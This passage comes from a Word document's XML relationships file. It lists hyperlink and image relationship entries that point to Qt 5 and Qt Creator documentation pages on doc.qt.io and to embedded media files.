Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId1097" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-dialogs-messagedialog.html" TargetMode="External"/><Relationship Id="rId2050" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-context2d.html" TargetMode="External"/><Relationship Id="rId2148" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsgmaterialtype.html" TargetMode="External"/><Relationship Id="rId674" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://qt-project.org/doc/qt-5.1/qtdoc/qtquick-internationalization.html" TargetMode="External"/><Relationship Id="rId881" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtgraphicaleffects-desaturate.html" TargetMode="External"/><Relationship Id="rId979" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-virtualkeyboard-hidekeyboardkey.html" TargetMode="External"/><Relationship Id="rId2355" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-layoutmirroring.html" TargetMode="External"/><Relationship Id="rId2562" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-syntax-objectattributes.html" TargetMode="External"/><Relationship Id="rId327" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qqmlengine.html" TargetMode="External"/><Relationship Id="rId534" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquickcontrols-index.html" TargetMode="External"/><Relationship Id="rId741" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtaudioengine-audioengine.html" TargetMode="External"/><Relationship Id="rId839" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-column.html" TargetMode="External"/><Relationship Id="rId1164" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-render-picktriangleevent.html" TargetMode="External"/><Relationship Id="rId1371" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-textmetrics.html" TargetMode="External"/><Relationship Id="rId1469" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-window-window.html" TargetMode="External"/><Relationship Id="rId2008" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.jpeg"/><Relationship Id="rId2215" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-mousearea.html" TargetMode="External"/><Relationship Id="rId2422" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-state.html" TargetMode="External"/><Relationship Id="rId2867" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-visualcanvas-scenegraph.html" TargetMode="External"/><Relationship Id="rId601" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtgraphicaleffects-dropshadow.html" TargetMode="External"/><Relationship Id="rId1024" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-input-keyboardhandler.html" TargetMode="External"/><Relationship Id="rId1231" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-render-rendercapturereply.html" TargetMode="External"/><Relationship Id="rId1676" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-layouts-layout.html" TargetMode="External"/><Relationship Id="rId1883" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-particles-spritegoal.html" TargetMode="External"/><Relationship Id="rId2727" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-typesystem-basictypes.html" TargetMode="External"/><Relationship Id="rId2934" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qvariant.html" TargetMode="External"/><Relationship Id="rId906" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtwinextras-dwmfeatures.html" TargetMode="External"/><Relationship Id="rId1329" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-render-stenciloperationarguments.html" TargetMode="External"/><Relationship Id="rId1536" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-qt.html" TargetMode="External"/><Relationship Id="rId1743" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-layouts-layout.html" TargetMode="External"/><Relationship Id="rId1950" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qttest-testcase.html" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-syntax-objectattributes.html" TargetMode="External"/><Relationship Id="rId1603" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-window-window.html" TargetMode="External"/><Relationship Id="rId1810" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qfiledialog.html" TargetMode="External"/><Relationship Id="rId184" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qobject.html" TargetMode="External"/><Relationship Id="rId391" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/resources.html" TargetMode="External"/><Relationship Id="rId1908" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId2072" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId251" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qqmlengine.html" TargetMode="External"/><Relationship Id="rId489" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-index.html" TargetMode="External"/><Relationship Id="rId696" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-input-abstractaxisinput.html" TargetMode="External"/><Relationship Id="rId2377" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image47.png"/><Relationship Id="rId2584" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-models-listmodel.html" TargetMode="External"/><Relationship Id="rId2791" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-models-listmodel.html" TargetMode="External"/><Relationship Id="rId349" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId556" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qguiapplication.html" TargetMode="External"/><Relationship Id="rId763" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtbluetooth-bluetoothsocket.html" TargetMode="External"/><Relationship Id="rId1186" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-render-pointsize.html" TargetMode="External"/><Relationship Id="rId1393" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtmultimedia-torch.html" TargetMode="External"/><Relationship Id="rId2237" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qevent.html" TargetMode="External"/><Relationship Id="rId2444" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-statesanimations-animations.html" TargetMode="External"/><Relationship Id="rId2889" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-behavior.html" TargetMode="External"/><Relationship Id="rId111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-qtobject.html" TargetMode="External"/><Relationship Id="rId209" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qobject.html" TargetMode="External"/><Relationship Id="rId416" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-module.html" TargetMode="External"/><Relationship Id="rId970" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-particles-groupgoal.html" TargetMode="External"/><Relationship Id="rId1046" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtsensors-lightsensor.html" TargetMode="External"/><Relationship Id="rId1253" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-layouts-rowlayout.html" TargetMode="External"/><Relationship Id="rId1698" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-layouts-layout.html" TargetMode="External"/><Relationship Id="rId2651" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtsql-attribution-sqlite.html" TargetMode="External"/><Relationship Id="rId2749" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-text.html" TargetMode="External"/><Relationship Id="rId2956" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-glossary.html" TargetMode="External"/><Relationship Id="rId623" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qlist.html" TargetMode="External"/><Relationship Id="rId830" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-coloranimation.html" TargetMode="External"/><Relationship Id="rId928" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-flipable.html" TargetMode="External"/><Relationship Id="rId1460" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtwebengine-webenginesettings.html" TargetMode="External"/><Relationship Id="rId1558" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-qt.html" TargetMode="External"/><Relationship Id="rId1765" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-layouts-layout.html" TargetMode="External"/><Relationship Id="rId2304" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId2511" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-animation-example.html" TargetMode="External"/><Relationship Id="rId2609" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qstringlist.html" TargetMode="External"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qqmlengine.html" TargetMode="External"/><Relationship Id="rId1113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtnfc-nearfield.html" TargetMode="External"/><Relationship Id="rId1320" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-stategroup.html" TargetMode="External"/><Relationship Id="rId1418" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtlocation-user.html" TargetMode="External"/><Relationship Id="rId1972" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-visualcanvas-adaptations.html" TargetMode="External"/><Relationship Id="rId2816" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickview.html" TargetMode="External"/><Relationship Id="rId1625" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-xmllistmodel-xmlrole.html" TargetMode="External"/><Relationship Id="rId1832" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-particles-particlegroup.html" TargetMode="External"/><Relationship Id="rId2094" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId273" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-index.html" TargetMode="External"/><Relationship Id="rId480" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-rectangle.html" TargetMode="External"/><Relationship Id="rId2161" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickitem.html" TargetMode="External"/><Relationship Id="rId2399" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-statesanimations-behaviors.html" TargetMode="External"/><Relationship Id="rId3005" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-qmlscene.html" TargetMode="External"/><Relationship Id="rId133" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-font.html" TargetMode="External"/><Relationship Id="rId340" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-component.html" TargetMode="External"/><Relationship Id="rId578" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-particles-particlegroup.html" TargetMode="External"/><Relationship Id="rId785" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtdatavisualization-camera3d.html" TargetMode="External"/><Relationship Id="rId992" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-particles-imageparticle.html" TargetMode="External"/><Relationship Id="rId2021" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickwindow.html" TargetMode="External"/><Relationship Id="rId2259" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://doc.qt.io/qt-5/images/declarative-qmlfocus4.png" TargetMode="External"/><Relationship Id="rId2466" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-animation-example.html" TargetMode="External"/><Relationship Id="rId2673" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-gridview.html" TargetMode="External"/><Relationship Id="rId2880" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickwindow.html" TargetMode="External"/><Relationship Id="rId200" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qmetaobject.html" TargetMode="External"/><Relationship Id="rId438" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-syntax-propertybinding.html" TargetMode="External"/><Relationship Id="rId645" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-listview.html" TargetMode="External"/><Relationship Id="rId852" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-connections.html" TargetMode="External"/><Relationship Id="rId1068" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtlocation-mappolygon.html" TargetMode="External"/><Relationship Id="rId1275" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtsensors-sensorreading.html" TargetMode="External"/><Relationship Id="rId1482" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-documents-topic.html" TargetMode="External"/><Relationship Id="rId2119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://doc.qt.io/qt-5/images/custom-geometry-example.png" TargetMode="External"/><Relationship Id="rId2326" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image40.png"/><Relationship Id="rId2533" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-particles-imageparticle.html" TargetMode="External"/><Relationship Id="rId2740" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-statemachine-state.html" TargetMode="External"/><Relationship Id="rId2978" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/graphicaleffects.html" TargetMode="External"/><Relationship Id="rId505" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId712" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-particles-affector.html" TargetMode="External"/><Relationship Id="rId1135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls2-pane.html" TargetMode="External"/><Relationship Id="rId1342" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls2-switch.html" TargetMode="External"/><Relationship Id="rId1787" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-dialogs-colordialog.html" TargetMode="External"/><Relationship Id="rId1994" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsgflatcolormaterial.html" TargetMode="External"/><Relationship Id="rId2838" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsgflatcolormaterial.html" TargetMode="External"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-qt.html" TargetMode="External"/><Relationship Id="rId1202" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtsensors-proximityreading.html" TargetMode="External"/><Relationship Id="rId1647" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-listview.html" TargetMode="External"/><Relationship Id="rId1854" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-particles-particlesystem.html" TargetMode="External"/><Relationship Id="rId2600" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-modelviewsdata-cppmodels.html" TargetMode="External"/><Relationship Id="rId2905" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickview.html" TargetMode="External"/><Relationship Id="rId1507" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-qtobject.html" TargetMode="External"/><Relationship Id="rId1714" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-layouts-layout.html" TargetMode="External"/><Relationship Id="rId295" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-javascript-resources.html" TargetMode="External"/><Relationship Id="rId1921" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://doc.qt.io/qt-5/images/visual-parent-example.png" TargetMode="External"/><Relationship Id="rId2183" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickitem.html" TargetMode="External"/><Relationship Id="rId2390" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-statesanimations-states.html" TargetMode="External"/><Relationship Id="rId2488" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-sequentialanimation.html" TargetMode="External"/><Relationship Id="rId3027" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qtcreator/creator-debug-mode.html" TargetMode="External"/><Relationship Id="rId155" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId362" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qtcreator/index.html" TargetMode="External"/><Relationship Id="rId1297" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-virtualkeyboard-spacekey.html" TargetMode="External"/><Relationship Id="rId2043" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-scenegraph-textureinthread-example.html" TargetMode="External"/><Relationship Id="rId2250" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.png"/><Relationship Id="rId2695" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-rectangle.html" TargetMode="External"/><Relationship Id="rId222" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qcolor.html" TargetMode="External"/><Relationship Id="rId667" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-shadereffectsource.html" TargetMode="External"/><Relationship Id="rId874" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtcharts-datetimeaxis.html" TargetMode="External"/><Relationship Id="rId2110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-index.html" TargetMode="External"/><Relationship Id="rId2348" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId2555" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-component.html" TargetMode="External"/><Relationship Id="rId2762" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-codesamples.html" TargetMode="External"/><Relationship Id="rId527" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-layouts-gridlayout.html" TargetMode="External"/><Relationship Id="rId734" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtcharts-areaseries.html" TargetMode="External"/><Relationship Id="rId941" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-logic-frameaction.html" TargetMode="External"/><Relationship Id="rId1157" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-pauseanimation.html" TargetMode="External"/><Relationship Id="rId1364" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls2-textarea.html" TargetMode="External"/><Relationship Id="rId1571" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquickcontrols-index.html" TargetMode="External"/><Relationship Id="rId2208" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-mousearea.html" TargetMode="External"/><Relationship Id="rId2415" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-statesanimations-states.html" TargetMode="External"/><Relationship Id="rId2622" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qqmlcontext.html" TargetMode="External"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-javascript-imports.html" TargetMode="External"/><Relationship Id="rId801" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtcanvas3d-canvas3dcontextattributes.html" TargetMode="External"/><Relationship Id="rId1017" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtwinextras-jumplistcategory.html" TargetMode="External"/><Relationship Id="rId1224" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-rect.html" TargetMode="External"/><Relationship Id="rId1431" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtmultimedia-video.html" TargetMode="External"/><Relationship Id="rId1669" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-positioning-layouts.html" TargetMode="External"/><Relationship Id="rId1876" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-particles-shape.html" TargetMode="External"/><Relationship Id="rId2927" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtglobal.html" TargetMode="External"/><Relationship Id="rId1529" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-text.html" TargetMode="External"/><Relationship Id="rId1736" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-layouts-layout.html" TargetMode="External"/><Relationship Id="rId1943" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qttest-testcase.html" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-connections.html" TargetMode="External"/><Relationship Id="rId1803" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-dialogs-filedialog.html" TargetMode="External"/><Relationship Id="rId177" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-syntax-objectattributes.html" TargetMode="External"/><Relationship Id="rId384" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qqmlengine.html" TargetMode="External"/><Relationship Id="rId591" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtgraphicaleffects-coloroverlay.html" 